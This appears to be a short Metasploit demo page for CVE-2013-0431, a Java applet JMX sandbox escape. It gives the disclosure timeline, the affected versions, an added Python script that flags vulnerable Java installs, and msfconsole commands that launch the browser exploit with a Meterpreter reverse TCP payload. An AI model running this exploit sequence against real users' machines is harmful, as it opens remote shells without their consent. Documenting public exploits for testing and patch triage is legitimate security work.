CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations on 2013-01-18
Vulnerability patched by the vendor on 2013-02-01
Vulnerability discovered being exploited in the wild by kafeine and EKwatcher on 2013-02-18
Metasploit PoC provided on 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous
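
For inventory triage against the affected range above, here is an added example (not part of the original post or of Metasploit) that parses `java -version` output and flags runtimes at or below 7U11. It reads "Java SE 7U11 and previous" as the Java 7 family up to Update 11, which is an assumption; the host names and sample outputs are constructed.

```python
import re

# Threshold taken from the page: Java SE 7 Update 11 and earlier.
# Assumption: only the Java 7 family is in scope of that statement.
AFFECTED_MAJOR = 7
LAST_AFFECTED_UPDATE = 11

# Legacy scheme used by Java 7: 1.<major>.<minor>[_<update>], e.g. 1.7.0_11-b21
_LEGACY = re.compile(r'1\.(\d+)\.\d+(?:_(\d+))?')
# Line printed by `java -version` (on stderr): java version "1.7.0_11"
_VERSION_LINE = re.compile(r'version\s+"([^"]+)"')


def parse_java_version(text):
    """Return (major, update) from `java -version` output or a bare
    version string; None when no version can be recognised."""
    quoted = _VERSION_LINE.search(text)
    candidate = quoted.group(1) if quoted else text.strip()
    legacy = _LEGACY.match(candidate)
    if legacy:
        return int(legacy.group(1)), int(legacy.group(2) or 0)
    modern = re.match(r'(\d+)', candidate)  # e.g. "17.0.2" -> major 17
    return (int(modern.group(1)), 0) if modern else None


def is_affected(text):
    """True/False for a recognised version; None when the input could not
    be parsed, so the caller can queue that host for manual review."""
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    major, update = parsed
    return major == AFFECTED_MAJOR and update <= LAST_AFFECTED_UPDATE


def affected_hosts(inventory):
    """Return the hosts whose reported runtime falls in the affected range."""
    return [host for host, out in inventory if is_affected(out) is True]


# Constructed inventory: (host, captured `java -version` output).
SAMPLE = [
    ("ws-01", 'java version "1.7.0_11"\n'
              'Java(TM) SE Runtime Environment (build 1.7.0_11-b21)'),
    ("ws-02", 'java version "1.7.0_13"'),
    ("ws-03", 'java version "1.7.0_09-icedtea"'),
    ("ws-04", 'openjdk version "17.0.2" 2022-01-18'),
    ("ws-05", "'java' is not recognized as an internal or external command"),
]

if __name__ == "__main__":
    print(affected_hosts(SAMPLE))
```

Hosts for which `is_affected` returns `None` (no parseable version) are not reported as affected and should be checked by hand.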

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February of 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo
